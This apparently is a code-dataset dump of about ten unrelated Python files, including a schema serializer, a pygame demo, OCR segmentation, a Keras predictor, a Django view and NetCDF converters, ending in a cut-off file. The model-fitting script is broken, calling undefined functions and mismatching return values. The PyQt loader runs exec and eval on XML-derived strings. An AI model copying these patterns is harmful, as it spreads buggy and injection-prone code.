set(cls.__fields__.keys()) - cls.get_write_only_fields()\n\n @classmethod\n def get_writable_fields(cls) -> 'SchemaFields':\n return set(cls.__fields__.keys()) - cls.get_read_only_fields()\n\n @classmethod\n def get_default_readable_fields(cls) -> 'SchemaFields':\n return (\n cls.__config__.default_readable_fields & set(cls.__fields__.keys())\n or cls.get_readable_fields()\n )\n\n @classmethod\n def get_field_max_length(cls, field_name: str) -> Optional[int]:\n field = cls.__fields__.get(field_name)\n if not field:\n return None\n field_type = field.type_\n if issubclass(field_type, ConstrainedStr):\n max_length = field_type.max_length\n elif isinstance(field_type, type) and issubclass(field_type, Enum):\n members_lengths = (len(str(i.value)) for i in field_type)\n max_length = max(members_lengths)\n else:\n max_length = field.field_info.max_length\n return int(max_length) if max_length else None\n\n @classmethod\n def get_default_response_fields_config(cls) -> 'ResponseFieldsConfig':\n config = cls._cache.get('default_response_fields_config')\n if config is None:\n config = {}\n for field_name in cls.get_default_readable_fields():\n nested_model = cls.__fields__[field_name].type_\n if is_subschema(nested_model):\n subfields = nested_model.get_default_readable_fields()\n else:\n subfields = set()\n config[field_name] = subfields\n cls._cache['default_response_fields_config'] = config\n return config\n\n @classmethod\n def get_full_response_fields_config(cls) -> 'ResponseFieldsConfig':\n config = {}\n for field_name in cls.get_readable_fields():\n nested_model = cls.__fields__[field_name].type_\n if is_subschema(nested_model):\n subfields = nested_model.get_readable_fields()\n else:\n subfields = set()\n config[field_name] = subfields\n return config\n\n @classmethod\n async def serialize(\n cls, obj: Any, fields: Optional[Mapping] = None, jsonable: bool = True, full: bool = False\n ) -> Any:\n if is_async_iterable(obj):\n obj = [obj async for obj in obj]\n is_mapping = is_mappable(obj)\n if not is_mapping and is_iterable(obj):\n return [await cls.serialize(item, fields, jsonable=jsonable, full=full) for item in obj]\n if not fields:\n fields = (\n cls.get_full_response_fields_config()\n if full\n else cls.get_default_response_fields_config()\n )\n serialized = {}\n for field_name, subfields in fields.items():\n if field_name not in cls.get_readable_fields():\n continue\n field = cls.__fields__[field_name]\n field_value = await cls._getattr(\n obj, field_name, default=field.default, is_mapping=is_mapping\n )\n if is_subschema(field.type_):\n subschema: Type[Schema] = field.type_\n subfields_config = (\n subschema.get_full_response_fields_config()\n if full\n else subschema.get_default_response_fields_config()\n )\n subattrs = {\n **subfields_config,\n **{\n subattr: set()\n for subattr in (subfields or [])\n if subattr in subschema.get_readable_fields()\n },\n }\n field_value = await subschema.serialize(\n field_value, fields=subattrs, jsonable=False\n )\n serialized[field_name] = field_value\n return jsonable_encoder(serialized) if jsonable else serialized\n\n async def get_serialized(self, fields: Optional[Mapping] = None, jsonable: bool = True) -> Any:\n return await self.serialize(self, fields=fields, jsonable=jsonable)\n\n @classmethod\n async def _getattr(\n cls, obj: Any, name: str, default: Any = None, is_mapping: bool = False,\n ) -> Any:\n if is_mapping:\n value = obj.get(name, None)\n else:\n value = getattr(obj, name, None)\n if callable(value):\n value = value()\n if 
is_awaitable(value):\n            value = await value\n        if is_async_iterable(value):\n            value = [val async for val in value]\n        return value or default\n\n\nclass ApiComponentName(str):\n    REGEX: Pattern = re.compile(r'[a-z_]+', flags=re.IGNORECASE)\n\n    @classmethod\n    def __get_validators__(cls) -> Iterator[Callable]:\n        yield cls.validate  # pragma: no cover\n\n    @classmethod\n    def validate(cls, value: Any) -> 'ApiComponentName':\n        if not isinstance(value, str):\n            raise TypeError('API component name must be a string')\n        elif not value:\n            raise ValueError('API component name must not be empty')\n        elif not cls.REGEX.fullmatch(value):\n            raise ValueError(\n                f'API component name \"{value}\" is invalid ' f'(allowed pattern: {cls.REGEX.pattern})'\n            )\n        return cls(value.lower())\n\n\ndef validate_schema(schema: Any) -> None:\n    assert isinstance(schema, type), f'{schema} is not a class'\n    assert issubclass(schema, Schema), f'{schema} is not subclassed from {Schema.__name__}'\n\n\ndef is_subschema(type_: Any) -> bool:\n    return isinstance(type_, type) and issubclass(type_, Schema)\n\n\nSchemaClass = Type[Schema]\nSchemaFields = Set[str]\nResponseFieldsConfig = Dict[str, Set[str]]\n","sub_path":"freddie/schemas.py","file_name":"schemas.py","file_ext":"py","file_size_in_byte":7788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"51826522","text":"# initialize pygame\nimport sys, pygame\npygame.init()\n\n# store the color black in an (r, g, b) vector for later use\nblack = (0, 0, 0)\n\n# create the screen; it must be given the screen size as a vector\ntamano_pantalla = [1000, 800]\nscreen = pygame.display.set_mode(tamano_pantalla)\n\n# load the image of a ball\nim_pelota = pygame.image.load(\"ball.bmp\")\n# create a rectangle that will represent the ball; it must be given a\n# vector for the position and another one for the size\nrect_pelota = pygame.Rect([0, 0], [111, 111])\n# store the ball velocity in a [Vx, Vy] vector measured in pixels/frame\nvel_pelota = [2, 2]\n\n# create a clock that can be used as an fps limiter\nclock = pygame.time.Clock()\n\n# enter a loop that never ends\nwhile 1:\n    # wait for 1/60 of a second to pass, to cap the fps at 60\n    clock.tick(60)\n\n    # check whether the close button was pressed and, if so, exit\n    for event in pygame.event.get():\n        if event.type == pygame.QUIT:\n            sys.exit()\n\n    # the rectangle already has a function that moves it by whatever the\n    # vector says; if the vector is e.g. 
[5, -6] the rectangle will move 5 to the\n    # right and 6 upwards\n    rect_pelota = rect_pelota.move(vel_pelota)\n\n    # if the rectangle is too far right or too far left\n    if rect_pelota.left < 0 or rect_pelota.right > tamano_pantalla[0]:\n        # invert the velocity in x\n        vel_pelota[0] = -vel_pelota[0]\n    # if the rectangle is too far up or too far down\n    if rect_pelota.top < 0 or rect_pelota.bottom > tamano_pantalla[1]:\n        # invert the velocity in y\n        vel_pelota[1] = -vel_pelota[1]\n\n    # paint the screen black to cover the previous frame; notice what happens\n    # if you delete or comment out this line\n    screen.fill(black)\n    # draw the ball at the rectangle's coordinates\n    screen.blit(im_pelota, rect_pelota)\n    # show the screen\n    pygame.display.flip()\n\n","sub_path":"prueba1/prueba2.py","file_name":"prueba2.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"275601835","text":"from PIL import Image\nimport pytesseract\nimport queue\n\ndef binarizing(img,threshold):\n    \"\"\"Take an image object, convert it to greyscale and binarise it\"\"\"\n    img = img.convert(\"L\") # convert to greyscale\n    # img.show()\n    pixdata = img.load()\n    w, h = img.size\n    # walk over every pixel; values below the threshold count as black\n    for y in range(h):\n        for x in range(w):\n            if pixdata[x, y] < threshold:\n                pixdata[x, y] = 255\n            else:\n                pixdata[x, y] = 0\n    return img\ndef depoint(img):\n    \"\"\"Take a binarised image and remove noise from it\"\"\"\n    pixdata = img.load()\n    w,h = img.size\n    for y in range(1,h-1):\n        for x in range(1,w-1):\n            count = 0\n            if pixdata[x,y-1] > 245:# up\n                count = count + 1\n            if pixdata[x,y+1] > 245:# down\n                count = count + 1\n            if pixdata[x-1,y] > 245:# left\n                count = count + 1\n            if pixdata[x+1,y] > 245:# right\n                count = count + 1\n            if pixdata[x-1,y-1] > 245:# upper left\n                count = count + 1\n            if pixdata[x-1,y+1] > 245:# lower left\n                count = count + 1\n            if pixdata[x+1,y-1] > 245:# upper right\n                count = count + 1\n            if pixdata[x+1,y+1] > 245:# lower right\n                count = count + 1\n            if count > 4:\n                pixdata[x,y] = 255\n    return img\n# CFS connected-component segmentation\ndef cfs(img):\n    \"\"\"Take a binarised image and split it into connected components\"\"\"\n    pixdata = img.load()\n    w,h = img.size\n    visited = set()\n    q = queue.Queue()\n    offset = [(-1,-1),(0,-1),(1,-1),(-1,0),(1,0),(-1,1),(0,1),(1,1)]\n    cuts = []\n    for x in range(w):\n        for y in range(h):\n            x_axis = []\n            #y_axis = []\n            if pixdata[x,y] == 0 and (x,y) not in visited:\n                q.put((x,y))\n                visited.add((x,y))\n            while not q.empty():\n                x_p,y_p = q.get()\n                for x_offset,y_offset in offset:\n                    x_c,y_c = x_p+x_offset,y_p+y_offset\n                    if (x_c,y_c) in visited:\n                        continue\n                    visited.add((x_c,y_c))\n                    try:\n                        if pixdata[x_c,y_c] == 0:\n                            q.put((x_c,y_c))\n                            x_axis.append(x_c)\n                            #y_axis.append(y_c)\n                    except:\n                        pass\n            if x_axis:\n                min_x,max_x = min(x_axis),max(x_axis)\n                if max_x - min_x > 3:\n                    # widths under 3 are treated as noise; adjust as needed\n                    cuts.append((min_x,max_x))\n    return cuts\ndef getCuts1(cuts):\n    newcuts = []\n    last = 0\n    for item in cuts:\n        if newcuts.__len__() == 0:\n            newcuts.append(item)\n            last = item[1]\n        else:\n            if last - item[0] > 10 or (newcuts[len(newcuts) - 1][1] - newcuts[len(newcuts) - 1][0] <= 30):\n                first = newcuts[len(newcuts) - 1][0]\n                last = max(last,item[1])\n                newcuts.pop()\n                # newcuts.remove(len(newcuts))\n                newcuts.append((first, last))\n            else:\n                newcuts.append(item)\n                last = item[1]\n    return newcuts\n\ndef getCuts2 (img, cuts):\n    '''Split characters that are stuck together'''\n    newcuts = []\n    for item in cuts:\n        if item[1] - item[0] > 60:\n            mid = getCuts3(img, (item[0] + item[1]) // 2)\n            newcuts.append((item[0], mid))\n            newcuts.append((mid, item[1]))\n        else:\n            newcuts.append(item)\n    return newcuts\ndef getCuts3(img, mid):\n    offset = 20\n    pixdata = 
img.load()\n    w, h = img.size\n    wl = 0 if(0 > mid - offset) else mid - offset\n    wr = mid + offset if(mid + offset < w) else w\n    min = h\n    ret = 0\n    for x in range(wl, wr):\n        count = 0\n        for y in range(h):\n            if (pixdata[x, y] == 0):\n                count = count + 1\n        if min > count:\n            min = count\n            ret = x\n    return ret\n\nif __name__ == '__main__':\n    src = None\n    try:\n        src = Image.open('first2.png')\n    except FileNotFoundError:\n        print('Failed to open the image file')\n        exit(0)\n    img = binarizing(src, 160)\n    img = depoint(img)\n    img.show()\n    cuts = cfs(img)\n    print(cuts)\n    cuts = getCuts1(cuts)\n    cuts = getCuts2(img, cuts)\n    print(cuts)\n    # images = []\n    w, h = img.size\n    for i, n in enumerate(cuts, 1):\n        temp = img.crop((n[0], 0, n[1], h)) # call crop to slice out this segment\n        # images.append(temp)\n        text = pytesseract.image_to_string(temp)\n        print(text)\n        temp.show()\n    # text=pytesseract.image_to_string(img)\n    # print(text)\n    # img.show()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"426982304","text":"def get_next_date(some_date):\n    \"\"\"Returns the date that follows the given one\n\n    Args:\n        some_date: the given source date\n\n    Returns: the next date\n    \"\"\"\n    if some_date in range(1,31):\n        print(some_date+1)\n    elif some_date == 31:\n        print(\"1\")\n    else:\n        print(\"an invalid date was entered\")\n","sub_path":"day_1/flow_control/task_4/implementation.py","file_name":"implementation.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"}
+{"seq_id":"581636119","text":"import cv2\nimport pandas as pd\nimport os\nimport numpy as np\nfrom sklearn.metrics import confusion_matrix\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nimport csv\n\nCATEGORIES = [\n    \"manipuri\", \n    \"bharatanatyam\", \n    \"odissi\", \n    \"kathakali\", \n    \"kathak\", \n    \"sattriya\", \n    \"kuchipudi\",\n    \"mohiniyattam\"\n]\n\ntest_csv = \"./data/test.csv\"\t\t# Path to test.csv file\ntest_images = \"./data/test/\"\t\t# Path to test images folder\n\nmodel = tf.keras.models.load_model('./cnn.model')\n\n# Preprocess image before testing\ndef preprocess(image):\n    IMG_SIZE = 200\n    img_array = cv2.imread(image, cv2.IMREAD_GRAYSCALE)\n    img_array = img_array / 255.0\n    new_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))\n    return new_array.reshape(-1, IMG_SIZE, IMG_SIZE, 1)\n\ndef img_predict(image):\n\t\"\"\"\n\tFunction takes the path of an image and returns\n\tthe predicted label.\n\t\"\"\"\n\n\timg = preprocess(image)\n\tpredict = model.predict(img)\n\tlabel = np.argmax([predict[0]])\n\treturn label\n\ndef prediction(path, test_images):\n\t\"\"\"\n\tFunction takes the path of the csv file, and the path to images folder\n\tExtracts each test image listed in the csv from the test folder,\n\tpasses it to the model and appends the result to predictions.csv\n\t\"\"\"\n\tcsv_file = \"predictions.csv\"\n\tres = []\n\tdf = pd.read_csv(path)\n\timages = df['Image']\n\timages = df.to_numpy()\t\t# Convert df to a numpy array of rows\n\tprint(f\"Test Size: {len(images)}\")\n\tfor img in images:\n\t\tprint(f\"Current image {img}\")\n\t\timg = img[0]\n\t\timg_path = os.path.join(test_images, img)\n\t\tlabel = img_predict(img_path)\n\t\tres.append(CATEGORIES[label])\n\n\tprint(\"Prediction complete . . 
.\")\n\tprint(\"Writing CSV file \")\n\n\twith open(csv_file, 'w') as f:\n\t\tw = csv.writer(f)\n\t\tw.writerow([\"Image\", \"target\"])\n\t\tfor i in range(len(images)):\n\t\t\tw.writerow([images[i][0], res[i]])\n\n\n\nprediction(test_csv, test_images)","sub_path":"predictl.py","file_name":"predictl.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"27554675","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 1 22:42:52 2015\n\n@author: scholl\n\"\"\"\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 1 16:48:16 2015\n\n@author: scholl\n\"\"\"\n\nimport sys, os\nsys.path.append(os.path.join(os.path.dirname(__file__), '..'))\nfrom aware import *\nfrom data import *\nfrom hmi import *\n\nfrom doisWidget import *\n\nfrom XMLFactorTag import *\nfrom XMLFactorAdapter import *\n\nimport threading\n\n \nif __name__ == \"__main__\":\n import sys\n app = QtGui.QApplication(sys.argv)\n MainWindow = QtGui.QMainWindow()\n \n ui = Ui_MainWindow()\n ui.setupUi(MainWindow)\n\n scan = Scan()\n \n listaTags = XMLFactorTag('Tag1.xml').create\n listaAdapters = XMLFactorAdapter(\"Adapter01.xml\").create\n \n tagsAdapter = []\n\n \n for tags in listaTags:\n tag_ = tags\n tag_ = tag_[:len(tag_)-1]\n tag_ = tag_.split(\",\")\n \n #Inicializa TAG\n tag = (tag_[1]).replace(\")\",\"\").replace(\"'\",\"\")\n ##############################3\n exec(tag+\"= Tag()\")\n \n #exec('globals()['+tag+'] = Tag()')\n ##############################\n adapter = tag_[10]\n tagsAdapter.append(adapter)\n #print \"adapter:\", adapter\n exec(adapter+\"= None\")\n #exec('globals()['+adapter+'] = '+adapter)\n \n \n #print \"TENTA GERAR ADAPTERS\"\n for adapter in listaAdapters:\n exec(adapter)\n \n #print \"TENTA GERAR TAGS\"\n for tag in listaTags: \n exec(tag)\n \n \n #add Tags em SCan\n aux = 0;\n for tag in listaTags:\n tag_ = tag\n tag_ = tag_[:len(tag_)-1]\n tag_ = tag_.split(\",\")\n tag = (tag_[1]).replace(\")\",\"\").replace(\"'\",\"\")\n #print \"9=\", tag\n #print tagsAdapter\n for adapter in tagsAdapter:\n if eval(adapter) == eval(tag)._adapter:\n #print \"adapter:\",adapter\n #print \"tag:\",tag \n #print \"É IGUAL\"\n eval(adapter)._t = eval(tag)\n eval(adapter).conect()\n scan.add(eval(tag))\n \n\n \"\"\" \n g = dict ( globals ())\n # Loop sobre pares.\n for item in g.items():\n print(item[0], \"=\", item[1]) , \"\\n\"\n \n print \"\\n \\n\"\n print \"1-tagGeradora =\", eval(\"tagGeradora\")\n print \"1-adapter01._t =\", eval(\"adapter01._t\")\n print \"1-adapter01 =\", eval(\"adapter01\")\n print \"1-tagGeradora._adapter =\", eval(\"tagGeradora._adapter\")\n print \"\\n\"\n print \"2-tagGeradora2 =\", eval(\"tagGeradora2\")\n print \"2-adapter02._t =\", eval(\"adapter02._t\")\n print \"2-adapter02 =\", eval(\"adapter02\")\n print \"2-tagGeradora2._adapter =\", eval(\"tagGeradora2._adapter\")\n print \"\\n\\n\"\n \"\"\"\n \"\"\"\n ('tagGeradora', '=', ) \n ('adapter01', '=', ) \n\n ('tagGeradora2', '=', ) \n ('adapter02', '=', ) \n \"\"\"\n\n #scan.add(tagGeradora)\n \n GeradorThread = threading.Thread(target=scan.run, ) \n GeradorThread.setDaemon(True)\n GeradorThread.start()\n \n MainWindow.show()\n sys.exit(app.exec_())","sub_path":"olds/tests/testsTela/testaTelaXML02.py","file_name":"testaTelaXML02.py","file_ext":"py","file_size_in_byte":3259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"590081146","text":"from django.shortcuts import render\nimport 
operator\n\ndef home(req):\n    return render(req,'home.html')\n\ndef Result(req):\n    #get the text from text area\n    fulltext = req.GET['word']\n    #displays on the terminal\n    #print(fulltext)\n    wordlist = fulltext.split()\n    wordDict = {}\n    #loop to create a hashtable with no. of repeats of a word\n    for word in wordlist:\n        if word in wordDict:\n            wordDict[word] += 1\n        else:\n            wordDict[word]=1\n\n    #print(wordDict)\n\n    #(word, repeat count) pairs sorted in descending order\n    wcount = sorted(wordDict.items(),key=operator.itemgetter(1),reverse=True)\n\n    return render(req,'CountRes.html',{'EnteredText':fulltext,'Count':len(wordlist),\"sortedwords\":wcount})\n","sub_path":"WordCounter/WordCounter/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"}
+{"seq_id":"514108072","text":"import os\ndef read_txt(filename):\n    with open(os.getcwd() + os.sep + \"Data\" + os.sep + filename, \"r\", encoding=\"utf-8\") as f:\n        arrs = []\n        for i in f.readlines():\n            arrs.append(tuple(i.strip().split(\",\")))\n        return arrs\n\ndef read_txt_1():\n    with open(\"../Data/login.txt\", \"r\", encoding=\"utf-8\") as f:\n        arrs = []\n        for i in f.readlines():\n            arrs.append(tuple(i.strip().split(\",\")))\n        return arrs\n\nif __name__ == '__main__':\n\n    print(read_txt_1())\n\n\"\"\"\n    1. f.readlines() returns a list of lines\n    2. i.strip() removes leading/trailing whitespace and newlines, returning a string\n    3. split(\",\") splits the string on commas and returns the pieces as a list\n    4. since we iterate line by line, each line has to be stored in a list, giving [[],[]]\n    5. expected result: [(),()], so each inner list must be cast with tuple([...])\n\"\"\"","sub_path":"Base/read_txt.py","file_name":"read_txt.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"}
+{"seq_id":"5858378","text":"import xarray as xr\nimport geojson\nimport json\nimport numpy\nfrom geojson import Point,Feature,FeatureCollection\nfrom integr import getDataFileRecord\n\ndef nc2jsonPoint(parameterName,date,time,lat,lng):\n\t#req_data = request.get_json()\n\t#parameterNameReceived = req_data['parameterName']\n\tparameterNameReceived = parameterName\n\n\n\tf = open('apicodes.json')\n\tapicodes = json.load(f)\n\tf.close()\n\tparameterInfo = apicodes[parameterNameReceived]\n\tparameterName = parameterInfo['name']\n\t#date = req_data['date']\n\tfileName = getDataFileRecord(\"copernicus\", date,0)\n\trequestedLat = lat #float(req_data['lat'])\n\trequestedLng = lng #float(req_data['lng'])\n\tdt= xr.open_dataset(fileName)\n\tvar = dt[parameterName]\n\tvar = var.sel(time=date,method=\"nearest\").squeeze()\n\n\tlatitudes = var.coords['latitude'].values.tolist()\n\tlongitudes = var.coords['longitude'].values.tolist()\n\n\tlatIndex=0\n\tlngIndex=0\n\tfor i in range(len(latitudes)):\n\t\tif latitudes[i]>=requestedLat:\n\t\t\tbreak\n\t\telse:\n\t\t\tlatIndex+=1\n\n\tfor i in range(len(longitudes)):\n\t\tif longitudes[i]>=requestedLng:\n\t\t\tbreak\n\t\telse:\n\t\t\tlngIndex+=1\n\n\tval = var.loc[dict(latitude=latitudes[latIndex],longitude=longitudes[lngIndex])]\n\tpointValue = Point((longitudes[lngIndex],latitudes[latIndex]))\n\tdataValue = val.values\n\tfeature = Feature(geometry=pointValue,properties={parameterName:dataValue})\n\treturn feature\n\ndef nc2json(parameterName,date,time):\n\t#req_data = request.get_json()\n\t#parameterNameReceived = req_data['parameterName']\n\tparameterNameReceived = parameterName\n\n\n\tf = open('apicodes.json')\n\tapicodes = json.load(f)\n\tf.close()\n\tparameterInfo = apicodes[parameterNameReceived]\n\tparameterName = 
parameterInfo['name']\n\t#date = req_data['date']\n\tfileName = getDataFileRecord(\"copernicus\", date,0)\n\tdt= xr.open_dataset(fileName)\n\tvar = dt[parameterName]\n\tvar = var.sel(time=date,method=\"nearest\").squeeze()\n\tfeature_list = []\n\tfor i in var.coords['latitude'].values.tolist():\n\t\tfor j in var.coords['longitude'].values.tolist():\n\t\t\tval = var.loc[dict(latitude=i,longitude=j)]\n\t\t\tpointValue = Point((j,i))\n\t\t\tdataValue = val.values\n\t\t\tfeatureAdded = Feature(geometry=pointValue,properties={parameterName:dataValue})\n\t\t\tfeature_list.append(featureAdded)\n\t\n\tfeature_collection= FeatureCollection(feature_list)\n\treturn feature_collection\n","sub_path":"datamanager/processing_gribnc_data/ncModule.py","file_name":"ncModule.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"}
+{"seq_id":"578766442","text":"# examples of complex numbers\nc1 = 2 + 3j # 2 + 3i, where 2 is the real part and 3 the imaginary part\nc2 = 5 - 5j # 5 - 5i\n\n# constructing a complex number from real numbers\na = 2\nb = 3\nc3 = complex(a, b)\nc4 = complex(5, -5)\n\nprint(c1, c2)\nprint(c3, c4)\n","sub_path":"Starter/002_Examples/03-complex-example.py","file_name":"03-complex-example.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"}
+{"seq_id":"426819098","text":"# STITCH THE STUFF TOGETHER -- PUTS THE MODEL OF FITTING DATA \n# TO POLYNOMIALIZATION NUMBER\n\nimport numpy as np\n\n# NOTE: readFromCSV, getFuncs, findRoots, makeFullSamples and polyFit are\n# expected to be provided by the surrounding scripts.\n\ndef func(A, F):\n    return 9.80655 * A / (2 * ((np.pi*F)**2))\n\ndef wrapper(fullpath, freq, format='polynomial'):\n    time, xaccel, yaccel, zaccel = readFromCSV(fullpath)\n    disp = findDisplacement(time, yaccel, freq)\n    warr, samplets, sampleys = getCoeff(time, yaccel, disp)\n\n    poly_ans, min_index = getFuncs(warr, samplets, sampleys, freq)\n    if format == 'polynomial':\n    \treturn poly_ans\n    elif format == 'hybrid':\n    \tdiscrete_ans = findRoots(samplets, sampleys, freq, min_index)\n    \treturn discrete_ans\n    else:\n    \treturn 'Error: format not found.'\n\ndef findDisplacement(time, accel, freq):\n    ftime, faccel = makeFullSamples(time, accel)\n    period = 1/float(freq)\n\n    start = 0\n    shifts = []\n    while start < 15: \n        sample = ftime[start] + period\n        ranked = sorted(ftime, key=lambda x: abs(x-sample))\n        shifts.append(list(ftime).index(ranked[0]) - start)\n        start = start + 1\n\n    result = int(np.average(shifts))\n    return result\n\ndef getCoeff(samplets, sampleas, degree = 3):\n    warr = []\n    for i in range(len(samplets)):\n        warr.append(polyFit(samplets[i], sampleas[i], degree))\n    return warr\n\n\n","sub_path":"version1/dev/old_version/python_scripts/makeModel.py","file_name":"makeModel.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"}
+{"seq_id":"65210717","text":"#!/usr/bin/env python\n\"\"\"\npyLTR MIX Time Series\n\nExecute './mixTimeSeries.py --help' for more information.\n\"\"\"\n\n# Custom\nimport pyLTR\n\n# 3rd-party\nimport pylab\nimport numpy\n\n# Standard\nimport pickle\nimport datetime\nimport math\nimport optparse\nimport os\nimport re\nimport sys\n\ndef parseArgs():\n    \"\"\"\n    Returns standard parameters used for extracting time series data from MIX output.\n    - path: Path to a directory containing a MIX run.\n    - run: Name of run (ie. 
'RUN-IDENTIFIER')\n - t0: datetime object of first step to be used in time series\n - t1: datetime object of last step to be used in time series\n Execute `mixTimeSeries.py --help` for more information.\n \"\"\"\n # additional optparse help available at:\n # http://docs.python.org/library/optparse.html\n # http://docs.python.org/lib/optparse-generating-help.html\n parser = optparse.OptionParser(usage='usage: %prog -p [PATH] [options]',\n version=pyLTR.Release.version)\n\n parser.add_option('-p', '--path', dest='path',\n default='/Users/schmitt/paraview/testData/March1995_LM_r1432_single',\n metavar='PATH', help='Path to base run directory containig MIX HDF files.')\n\n parser.add_option('-r', '--runName', dest='runName',\n default='', metavar='RUN_IDENTIFIER', help='Optional name of run. Leave empty unless there is more than one run in a directory.')\n\n parser.add_option('-f', '--first', dest='t0',\n default='', metavar='YYYY-MM-DD-HH-MM-SS', help='Date & Time that should be the first element of the time series')\n\n parser.add_option('-l', '--last', dest='t1',\n default='', metavar='YYYY-MM-DD-HH-MM-SS', help='Date & Time of last element for the time series')\n\n parser.add_option('-a', '--about', dest='about', default=False, action='store_true',\n help='About this program.')\n\n (options, args) = parser.parse_args()\n if options.about:\n print((sys.argv[0] + ' version ' + pyLTR.Release.version))\n print('')\n print('This script searches a path for any MIX ionosphere output files and ')\n print('computes useful metrics:')\n print(' - Cross Polar Cap Potential (cpcp)')\n print(' - Hemispheric Power (hp)')\n print(' - Positive current density (ipfac)')\n print('for both the Northern and Southern hemispheres.')\n print('')\n print('This script outputs two files:')\n print(' 1. \"runPath/mixTimeSeries.png\" - summary plot of variables')\n print(' 2. \"runPath/mixTimeSeries.pkl\" - pyLTR.TimeSeries file ')\n print(' serialized with the Python Pickle package. 
See the ')\n print(' Python cPickle documentation for details on extracting ')\n print(' the data.')\n print('To limit the time range, use the \"--first\" and/or \"--last\" flags.')\n print(('Execute \"' + sys.argv[0] + ' --help\" for details.'))\n print('')\n sys.exit()\n\n # --- Sanitize inputs\n\n path = options.path\n assert( os.path.exists(path) )\n\n run = options.runName\n\n # --- Parse date & time strings\n regex = r'^(\\d{4})-' # YYYY year\n regex += r'(0?[1-9]|1[012])-' # MM month\n regex += r'(0?[1-9]|[12]\\d|3[01])-' # DD day \n regex += r'(0?\\d|1\\d|2[0-4])-' # HH hours\n regex += r'([0-5]?\\d?|60)-'# MM minutes\n regex += r'([0-5]?\\d?|60)$' # SS seconds\n t0 = None\n\n if options.t0:\n g = re.match(regex, options.t0).groups()\n assert( len(g) == 6 ) # Year, Month, Day, Hour, Minute, Second\n t0 = datetime.datetime( int(g[0]), int(g[1]), int(g[2]), int(g[3]), int(g[4]), int(g[5]) )\n\n # --- Make sure the datetime string is valid\n t1 = None\n if options.t1:\n g = re.match(regex, options.t1).groups()\n assert( len(g) == 6 ) # Year, Month, Day, Hour, Minute, Second\n t1 = datetime.datetime( int(g[0]), int(g[1]), int(g[2]), int(g[3]), int(g[4]), int(g[5]) )\n \n return (path, run, t0, t1)\n\ndef extractQuantities(path, run, t0, t1):\n \"\"\"\n Extract MIX quantities from the input path.\n \n Execute `mixTimeSeries.py --help` for details on the function parameters (path,run,t0,t1).\n \n Outputs a pyLTR.TimeSeries object containing the data.\n \"\"\"\n data = pyLTR.Models.MIX(path, run)\n\n # hard-coded input for testing & debugging:\n #data = pyLTR.Models.LFM('/hao/aim2/schmitt/data/LTR-2_0_1b/r1432/March1995/LR/single', 'LRs')\n \n #Make sure variables are defined in the model.\n modelVars = data.getVarNames()\n for v in ['Grid X', 'Grid Y', \n 'Potential North [V]', 'Potential South [V]', \n 'FAC North [A/m^2]', 'FAC South [A/m^2]',\n 'Pedersen conductance North [S]', 'Pedersen conductance South [S]', \n 'Hall conductance North [S]', 'Hall conductance South [S]', \n 'Average energy North [keV]', 'Average energy South [keV]',\n 'Number flux North [1/cm^2 s]', 'Number flux South [1/cm^2 s]']:\n assert( v in modelVars )\n\n timeRange = data.getTimeRange()\n if len(timeRange) == 0:\n raise Exception(('No data files found. Are you pointing to the correct run directory?'))\n\n index0 = 0\n if t0:\n for i,t in enumerate(timeRange):\n if t0 >= t:\n index0 = i\n\n index1 = len(timeRange)-1\n if t1:\n for i,t in enumerate(timeRange):\n if t1 >= t:\n index1 = i \n\n print(( 'Extracting MIX quantities for time series over %d time steps.' 
% (index1-index0) ))\n \n # Output a status bar displaying how far along the computation is.\n progress = pyLTR.StatusBar(0, index1-index0)\n progress.start()\n\n t_doy = []\n cpcpNorth = []\n cpcpSouth = []\n hpNorth = []\n hpSouth = []\n ipfacNorth = []\n ipfacSouth = []\n\n # Pre-compute area of the grid.\n x = data.read('Grid X', timeRange[index0])\n y = data.read('Grid Y', timeRange[index0])\n # Fix singularity at the pole\n x[:,0] = 0.0\n y[:,0] = 0.0\n z = numpy.sqrt(1.0-x**2-y**2)\n ri = 6500.0e3 # Radius of ionosphere\n areaMixGrid = pyLTR.math.integrate.calcFaceAreas(x,y,z)*ri*ri\n\n for i,time in enumerate(timeRange[index0:index1]):\n try:\n # -- Day of Year\n tt = time.timetuple()\n t_doy.append(tt.tm_yday+tt.tm_hour/24.0+tt.tm_min/1440.0+tt.tm_sec/86400.0)\n\n # --- Cross Polar Cap Potential\n psiNorth = data.read('Potential North [V]', time) / 1000.0\n cpcpNorth.append(psiNorth.max() - psiNorth.min())\n\n psiSouth = data.read('Potential South [V]', time) / 1000.0\n cpcpSouth.append(psiSouth.max() - psiSouth.min())\n \n # --- Hemispheric Power\n energy = data.read('Average energy North [keV]', time)\n flux = data.read('Number flux North [1/cm^2 s]', time)\n hp = areaMixGrid*energy[:-1,:-1] * flux[:-1,:-1]\n # KeV/cm^2s to mW/m^2 to GW\n hpNorth.append(hp.sum() * 1.6e-21) \n\n energy = data.read('Average energy South [keV]', time)\n flux = data.read('Number flux South [1/cm^2 s]', time)\n hp = 